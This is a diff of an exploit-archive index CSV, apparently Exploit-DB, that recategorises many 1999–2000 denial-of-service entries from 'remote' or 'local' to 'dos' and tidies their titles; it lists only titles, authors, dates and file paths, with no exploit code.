 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
 19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic Vulnerability",1999-09-23,"David Brumley",solaris,remote,0
 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability",1999-09-23,"Brock Tellier",linux,local,0
@@ -16878,7 +16878,7 @@ id,file,description,date,author,platform,type,port
 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation Vulnerability",1999-09-17,"Tymm Twillman",linux,local,0
 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0
 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0
-19513,platforms/hardware/remote/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 DoS",1999-09-27,"Bjorn Stickler",hardware,remote,0
+19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
@@ -16905,7 +16905,7 @@ id,file,description,date,author,platform,type,port
 19538,platforms/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration Vulnerability",1999-10-05,KSR[T],hardware,remote,0
 19539,platforms/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 IFRAME Vulnerability",1999-10-11,"Georgi Guninski",windows,remote,0
 19540,platforms/windows/remote/19540.txt,"t. hauck jana webserver 1.0/1.45/1.46 - Directory Traversal Vulnerability",1999-10-08,"Jason Lutz",windows,remote,0
-19541,platforms/novell/remote/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,remote,0
+19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service Vulnerability",1999-10-08,"Bruce Dennison",novell,dos,0
 19542,platforms/sco/local/19542.txt,"SCO Open Server <= 5.0.5 - 'userOsa' symlink Vulnerability",1999-10-11,"Brock Tellier",sco,local,0
 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 cancel Buffer Overflow Vulnerability",1999-10-08,"Brock Tellier",sco,local,0
 19544,platforms/linux/local/19544.c,"BSD/OS 2.1_FreeBSD <= 2.1.5_NeXTstep 4.x_IRIX <= 6.4_SunOS 4.1.3/4.1.4 lpr Buffer Overrun(1)",1996-10-25,"Vadim Kolontsov",linux,local,0
@@ -16941,8 +16941,8 @@ id,file,description,date,author,platform,type,port
 19574,platforms/php/webapps/19574.txt,"Webify Link Directory SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0
 19575,platforms/windows/dos/19575.txt,".Net Framework - Tilde Character DoS",2012-07-04,"Soroush Dalili",windows,dos,0
 19576,platforms/windows/remote/19576.rb,"IBM Rational ClearQuest CQOle Remote Code Execution",2012-07-05,metasploit,windows,remote,0
-19577,platforms/windows/remote/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1)",1999-10-31,nas,windows,remote,0
-19578,platforms/windows/remote/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,remote,0
+19577,platforms/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)",1999-10-31,nas,windows,dos,0
+19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0
 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability",1999-12-10,"Pauli Ojanpera",windows,local,0
 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 Privileged Program Debugging Vulnerability",1999-12-10,"Brock Tellier",sco,local,0
 19675,platforms/linux/local/19675.c,"Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0
@@ -16964,7 +16964,7 @@ id,file,description,date,author,platform,type,port
 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0
 19594,platforms/windows/local/19594.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Spoolss.exe DLL Insertion Vulnerability",1999-11-04,"Marc of eEye",windows,local,0
 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilties",1999-11-03,Kerb,windows,remote,0
-19596,platforms/windows/remote/19596.txt,"Byte Fusion BFTelnet 1.1 Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,remote,0
+19596,platforms/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username DoS Vulnerability",1999-11-03,"Ussr Labs",windows,dos,0
 19597,platforms/php/webapps/19597.txt,"GuestBook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0
 19598,platforms/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0
 19600,platforms/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,php,webapps,0
@@ -16982,8 +16982,8 @@ id,file,description,date,author,platform,type,port
 19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
 19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460
 19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0
-19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0
-19616,platforms/windows/remote/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Buffer Overflow Denial of Service",1999-11-08,Interrupt,windows,remote,0
+19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0
+19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0
 19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0
 19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0
 19619,platforms/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server DoS Vulnerability",1999-11-10,"Ussr Labs",windows,dos,0
@@ -17001,12 +17001,12 @@ id,file,description,date,author,platform,type,port
 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink Webserver Vulnerability",1999-11-17,"Dennis W. Mattison",hardware,remote,0
 19633,platforms/windows/local/19633.txt,"Windows 95/98/Enterprise Server 4/NT Server 4/Terminal Server 4/Workstation 4 Riched Buffer Overflow",1999-11-17,"Pauli Ojanpera",windows,local,0
 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow Vulnerabilities",1999-11-13,scut,linux,remote,0
-19635,platforms/solaris/remote/19635.c,"Sun Solaris 7.0 rpc.ttdbserver Denial of Service Vulnerability",1999-11-19,"Elias Levy",solaris,remote,0
-19636,platforms/windows/remote/19636.txt,"Dick Lin ZetaMail 2.1 Login DoS Vulnerability",1999-11-18,"Ussr Labs",windows,remote,0
+19635,platforms/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service Vulnerability",1999-11-19,"Elias Levy",solaris,dos,0
+19636,platforms/windows/dos/19636.txt,"Dick Lin ZetaMail 2.1 - Login DoS Vulnerability",1999-11-18,"Ussr Labs",windows,dos,0
 19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5.0 for Windows 2000/95/98/NT 4 XML HTTP Redirect Vulnerability",1999-11-22,"Georgi Guninksi",windows,remote,0
-19638,platforms/windows/remote/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 NULL Data DoS Vulnerability",1999-11-19,"Kevork Belian",windows,remote,0
+19638,platforms/windows/dos/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 - NULL Data DoS Vulnerability",1999-11-19,"Kevork Belian",windows,dos,0
 19639,platforms/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow DoS Vulnerability",1999-11-24,"Ussr Labs",windows,dos,0
-19640,platforms/windows/remote/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL DoS Vulnerability",1999-11-26,"Ussr Labs",windows,remote,0
+19640,platforms/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long 
URL DoS Vulnerability",1999-11-26,"Ussr Labs",windows,dos,0
 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 Xsco Buffer Overflow Vulnerability",1999-11-25,K2,sco,local,0
 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 xlock(1) (long username) Buffer Overflow Vulnerability",1999-11-25,AK,sco,local,0
 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 su(1) Buffer Overflow Vulnerability",1999-10-30,K2,sco,local,0
@@ -17030,7 +17030,7 @@ id,file,description,date,author,platform,type,port
 19661,platforms/sco/local/19661.c,"SCO Unixware 7.1 pkginstall Buffer Overflow",1999-12-06,"Brock Tellier",sco,local,0
 19662,platforms/windows/remote/19662.txt,"Microsoft Internet Explorer 4.1/5.0/4.0.1 - Subframe Spoofing Vulnerability",1999-11-30,"Georgi Guninski",windows,remote,0
 19663,platforms/solaris/remote/19663.c,"Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop (print_domain_name) Buffer Overflow Vulnerability",1999-12-07,K2,solaris,remote,0
-19664,platforms/windows/remote/19664.txt,"Cat Soft Serv-U 2.5 a Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,remote,0
+19664,platforms/windows/dos/19664.txt,"Cat Soft Serv-U 2.5 a - Server SITE PASS DoS Vulnerability",1999-12-02,"Ussr Labs",windows,dos,0
 19665,platforms/windows/local/19665.txt,"Microsoft Internet Explorer 5.0 - vnd.ms.radio URL Vulnerability",1999-12-06,"Jeremy Kothe",windows,local,0
 19666,platforms/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 DoS Vulnerability",1999-12-06,"Ussr Labs",windows,dos,0
 19667,platforms/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Buffer Overflow Vulnerability",1999-12-09,"Amanda Woodward",multiple,remote,0
@@ -17042,7 +17042,7 @@ id,file,description,date,author,platform,type,port
 19678,platforms/windows/local/19678.c,"VDOLive Player 3.0.2 - Buffer Overflow Vulnerability",1999-12-13,UNYUN,windows,local,0
 19679,platforms/windows/remote/19679.txt,"Infoseek Ultraseek 2.1/3.1 for NT GET Buffer Overflow Vulnerability",1999-12-15,"Ussr Labs",windows,remote,0
 19680,platforms/sco/remote/19680.c,"SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability",1999-12-22,"Brock Tellier",sco,remote,0
-19681,platforms/solaris/remote/19681.txt,"Solaris 7.0 DMI Denial of Service Vulnerabilities",1999-12-22,"Brock Tellier",solaris,remote,0
+19681,platforms/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service Vulnerabilities",1999-12-22,"Brock Tellier",solaris,dos,0
 19682,platforms/novell/remote/19682.txt,"Netscape Enterprise Server _Novell Groupwise 5.2/5.5 GWWEB.EXE Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",novell,remote,0
 19683,platforms/windows/local/19683.c,"Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 Weak Password Encryption Vulnerability",1999-12-19,"Mike Davis",windows,local,0
 19684,platforms/multiple/local/19684.c,"SCO Open Server 5.0.5_IRIX 6.2 ibX11/X11 Toolkit/Athena Widget Library Buffer Overflows Vulnerability",1999-12-20,"Last Stage of Delirium",multiple,local,0
@@ -17056,13 +17056,13 @@ id,file,description,date,author,platform,type,port
 19692,platforms/multiple/local/19692.c,"Netscape Communicator 4.5 prefs.js Buffer Overflow Vulnerability",1999-12-24,"Steve Fewer",multiple,local,0
 19693,platforms/linux/local/19693.txt,"Python Untrusted Search Path/Code Execution Vulnerability",2012-07-09,rogueclown,linux,local,0
 19694,platforms/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal Vulnerability",1999-12-29,"Rudi Carell",unix,remote,0
-19695,platforms/windows/remote/19695.txt,"Michael Lamont Savant WebServer 2.0 NULL Character DoS Vulnerability",1999-12-28,"Ussr Labs",windows,remote,0
+19695,platforms/windows/dos/19695.txt,"Michael Lamont Savant WebServer 2.0 - NULL Character DoS Vulnerability",1999-12-28,"Ussr Labs",windows,dos,0
 19696,platforms/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 w3-msql Buffer Overflow",1999-10-28,Zhodiac,solaris,remote,0
 19697,platforms/unix/local/19697.c,"IBM Network Station Manager 2.0 R1 Race Condition Vulnerability",1999-12-27,"Brock Tellier",unix,local,0
 19698,platforms/linux/local/19698.txt,"Great Circle Associates Majordomo 1.94.4 - Local resend Vulnerability",1999-12-28,"Brock Tellier",linux,local,0
 19699,platforms/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter Vulnerability (1)",1999-12-29,Shevek,linux,local,0
 19700,platforms/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter Vulnerability (2)",1999-12-29,morpheus[bd],linux,local,0
-19701,platforms/linux/remote/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 ETRN Denial of Service Vulnerability",1999-12-22,"Michal Zalewski",linux,remote,0
+19701,platforms/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service Vulnerability",1999-12-22,"Michal Zalewski",linux,dos,0
 19702,platforms/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 GET Buffer Overflow",1999-12-30,"Ussr Labs",windows,dos,0
 19703,platforms/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 GET Buffer Overflow Vulnerability",1999-12-31,"Ussr Labs",windows,dos,0
 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 PATH Vulnerability",1999-12-30,Loneguard,multiple,local,0
@@ -17109,7 +17109,7 @@ id,file,description,date,author,platform,type,port
 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA Pipe Vulnerability",2000-02-04,"Iain Wade",cgi,remote,0
 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy DoS Vulnerability",2000-02-04,"Chicken Man",novell,dos,0
 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x Null Terminated Strings Vulnerability",2000-02-08,"Vanja Hrustic",cgi,remote,0
-19748,platforms/windows/remote/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 RETR DoS",2000-02-10,"Nobuo Miwa",windows,remote,0
+19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR DoS",2000-02-10,"Nobuo Miwa",windows,dos,0
 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x Traffic Amplification and NS Route Discovery Vulnerability",2000-02-14,Sebastian,multiple,remote,0
 19750,platforms/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 DoS Vulnerability",2000-02-11,eth0,multiple,dos,0
 19751,platforms/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",multiple,remote,0
@@ -17138,14 +17138,14 @@ id,file,description,date,author,platform,type,port
 19777,platforms/windows/dos/19777.txt,"IE 9_ SharePoint_ Lync toStaticHTML HTML Sanitizing Bypass",2012-07-12,"Adi Cohen",windows,dos,0
 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0
 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0
-19780,platforms/multiple/remote/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,remote,0
+19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - DoS Vulnerabilities",2000-02-26,"Jeff Stevens",multiple,dos,0
 19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group EZShopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0
 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 DoS Vulnerability",2000-02-28,"Jon Hittner",windows,dos,0
 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 GET Request Vulnerability",1999-08-25,"ISS X-Force",windows,dos,0
 19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD Authentication Vulnerability",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0
 19785,platforms/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",unix,remote,0
 19786,platforms/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 Input Validation Vulnerability",2000-03-02,"Jonathan Leto",cgi,remote,0
-19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0
+19787,platforms/linux/local/19787.txt,"Corel Linux OS 1.0 - DoSemu Distribution Configuration Vulnerability",2000-03-02,suid,linux,local,0
 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0_SGI IRIX 6.5.x fname Vulnerability",2000-03-05,rpc,irix,remote,0
 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow Vulnerability",2000-03-06,dildog,windows,local,0
 19790,platforms/php/webapps/19790.txt,"webpagetest <= 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0
@@ -17176,9 +17176,9 @@ id,file,description,date,author,platform,type,port
 19815,platforms/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal Vulnerability",2000-03-21,"Johan Nilsson",windows,remote,0
 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19_Debian 2.x_RedHat 6.x_S.u.S.E 5.3/6.x gpm Setgid Vulnerability",2000-03-22,"Egmont Koblinger",linux,local,0
 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0
-19818,platforms/linux/local/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,local,0
+19818,platforms/linux/dos/19818.c,"Linux kernel 2.2.12/2.2.14/2.3.99_RedHat 6.x - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
 19819,platforms/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read Vulnerability",2000-03-27,"Quan Peng",windows,remote,0
-19820,platforms/windows/remote/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 DoS Vulnerability",2000-03-25,"Presto Chango",windows,remote,0
+19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - DoS Vulnerability",2000-03-25,"Presto Chango",windows,dos,0
 19821,platforms/multiple/local/19821.c,"Citrix MetaFrame 1.0/1.8 - Weak Encryption Vulnerability",2000-03-29,"Dug Song",multiple,local,0
 19822,platforms/irix/remote/19822.c,"SGI IRIX 5.x/6.x Objectserver Vulnerability",2000-03-29,"Last Stage of Delirium",irix,remote,0
 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 Machine Vulnerabilities",2000-03-24,kadokev,unix,local,0
@@ -17208,7 +17208,7 @@ id,file,description,date,author,platform,type,port
 19847,platforms/unix/remote/19847.c,"UoW imapd 10.234/12.264 - Buffer Overflow Vulnerabilities",2002-08-01,"Gabriel A. Maggiotti",unix,remote,0
 19848,platforms/unix/remote/19848.pm,"UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0
 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)",2000-04-16,vlad902,unix,remote,0
-19850,platforms/linux/local/19850.c,"RedHat Linux 6.x X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,local,0
+19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server DoS and Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0
 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A crypt() Vulnerability",2000-04-15,Sean,qnx,local,0
 19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0
 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0
@@ -17228,7 +17228,7 @@ id,file,description,date,author,platform,type,port
 19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion Vulnerability",2000-04-21,Peter_M,linux,local,0
 19868,platforms/linux/remote/19868.c,"LCDProc 0.4 - Buffer Overflow Vulnerability",2000-04-23,"Andrew Hobgood",linux,remote,0
 19869,platforms/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0_ RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File DoS",2000-04-19,"Alex Mottram",linux,dos,0
-19870,platforms/linux/local/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,local,0
+19870,platforms/linux/dos/19870.pl,"CVS 1.10.7 - Local Denial of Service Vulnerability",2000-04-23,"Michal Szymanski",linux,dos,0
 19871,platforms/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall Port 67 Vulnerability",2000-04-24,"Wally Whacker",windows,remote,0
 19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (1)",2000-04-24,DiGiT,solaris,local,0
 19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 - lpset -r Buffer Overflow Vulnerability (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0
@@ -17273,17 +17273,17 @@ id,file,description,date,author,platform,type,port
 19916,platforms/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (1)",2000-05-16,"Hugo Breton",multiple,remote,0
 19917,platforms/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (2)",2000-05-16,L0pht,multiple,remote,0
 19918,platforms/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers Version 1.0 - DNS Overflow Vulnerability (3)",2000-05-16,L0pht,multiple,remote,0
-19919,platforms/hardware/remote/19919.c,"Cisco 7xx Series Router DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,remote,0
+19919,platforms/hardware/dos/19919.c,"Cisco 7xx Series Router - DoS Vulnerability",1999-03-11,Tiz.Telesup,hardware,dos,0
 19920,platforms/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow DoS Vulnerability",2000-05-16,"HaCk-13 TeaM",multiple,dos,0
 19921,platforms/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,cgi,remote,0
 19922,platforms/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",windows,remote,0
-19923,platforms/hardware/remote/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 DoS Vulnerability",2000-05-17,cassius,hardware,remote,0
+19923,platforms/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - DoS Vulnerability",2000-05-17,cassius,hardware,dos,0
 19924,platforms/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (1)",2000-05-16,duke,bsd,remote,0
 19925,platforms/linux/local/19925.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (2)",2000-05-26,"Jim Paris",linux,local,0
 19926,platforms/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0_MIT Kerberos 4/5_RedHat 6.2 Compatibility krb_rd_req() Buffer Overflow (3)",2000-04-08,"Jim Paris",linux,remote,0
 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - CSRF Add Admin",2012-07-18,DaOne,php,webapps,0
 19928,platforms/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 Filetype Vulnerability",2000-05-13,http-equiv,windows,remote,0
-19965,platforms/multiple/remote/19965.txt,"HP JetAdmin 6.0 Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,remote,0
+19965,platforms/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing DoS Vulnerability",2000-05-24,"Ussr Labs",multiple,dos,0
 19966,platforms/linux/remote/19966.c,"Marty Bochane MDBms 0.9 xbx Buffer Overflow Vulnerability",2000-05-24,"HaCk-13 TeaM",linux,remote,0
 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0
 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998
@@ -17321,7 +17321,7 @@ id,file,description,date,author,platform,type,port
 19971,platforms/unix/local/19971.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (1)",2000-05-07,Scrippie,unix,local,0
 19972,platforms/unix/local/19972.c,"Elm Development Group ELM 2.4/2.5.1 Mail for UNIX (ELM) Buffer Overflow (2)",2000-05-27,Buffer0verfl0w,unix,local,0
 19973,platforms/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,windows,remote,0
-19974,platforms/windows/local/19974.c,"Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability",2000-05-31,"Kit Knox",windows,local,0
+19974,platforms/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - DoS Vulnerability",2000-05-31,"Kit Knox",windows,dos,0
 19975,platforms/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability",2000-05-31,"H D Moore",windows,remote,0
 19976,platforms/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Buffer Overflow Vulnerability",2000-06-01,"Delphis Consulting",windows,remote,0
 19977,platforms/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta View-Source DoS Vulnerability",2000-06-01,"Ussr Labs",multiple,dos,0
@@ -17352,8 +17352,8 @@ id,file,description,date,author,platform,type,port
